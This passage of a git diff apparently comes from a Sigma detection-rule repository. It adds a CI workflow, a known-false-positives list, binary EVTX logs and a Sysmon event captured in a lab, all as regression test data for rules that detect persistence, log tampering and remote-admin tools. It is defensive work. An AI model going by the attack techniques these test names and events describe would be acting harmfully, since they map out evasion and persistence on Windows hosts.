regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml create mode 100644 regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx create mode 100644 regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json create mode 100644 regression_data/windows/sysmon/sysmon_config_modification/info.yml delete mode 100644 rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml create mode 100644 rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml rename rules/windows/registry/{registry_add/registry_add_persistence_com_key_linking.yml => registry_set/registry_set_persistence_com_key_linking.yml} (70%) rename rules/windows/registry/{registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml => registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml} (71%) rename rules/windows/registry/{registry_add/registry_add_pua_sysinternals_execution_via_eula.yml => registry_set/registry_set_pua_sysinternals_execution_via_eula.yml} (78%) rename rules/windows/registry/{registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml => registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml} (91%) rename rules/windows/registry/{registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml => registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml} (87%) create mode 100644 tests/regression_tests_runner.py diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index 8da643d5e..7d1ae95bc 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -70,4 +70,6 @@ ef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.* 65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval) de587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\Discord\\ 24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\.exe +8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\.exe +c7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.* dcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr diff --git a/.github/workflows/regression-tests.yml b/.github/workflows/regression-tests.yml new file mode 100644 index 000000000..ff56eb9e8 --- /dev/null +++ b/.github/workflows/regression-tests.yml @@ -0,0 +1,31 @@ +name: Regression Tests + +on: [push, pull_request, workflow_dispatch] + +env: + EVTX_BASELINE_VERSION: v0.8.2 + +jobs: + true-positive-tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + + - name: Set up Python + uses: actions/setup-python@v6 + with: + python-version: '3.11' + + - name: Install Python dependencies + run: | + python -m pip install --upgrade pip + pip install pyyaml + + - name: Download evtx-sigma-checker + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + chmod +x evtx-sigma-checker + + - name: Run regression tests + run: | + python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx new file mode 100644 index 0000000000000000000000000000000000000000..21fd14fbbd9d7782d2fe43d8397412572fd13e8e GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json new file mode 100644 index 000000000..8e4e9362e --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:36:29.111126Z" + } + }, + "EventRecordID": 18267, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:36:29.110", + "ProcessGuid": "5AA13A44-0D74-68FC-EB1D-000000004002", + "ProcessId": 5624, + "Image": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\is-3C3LU.tmp\\Advanced_IP_Scanner_2.5.4594.1(1).tmp", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Advanced IP Scanner 2\\platforms\\qwindows.dll", + "CreationUtcTime": "2025-10-24 10:44:35.897", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..1485a4dc0 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml @@ -0,0 +1,13 @@ +id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fed85bf9-e075-4280-9159-fbe8a023d6fa + title: Advanced IP Scanner - File Event +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx new file mode 100644 index 0000000000000000000000000000000000000000..064b8b657635f79f3381cefe8368c96bfb385a14 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json new file mode 100644 index 000000000..0ead262af --- /dev/null +++ 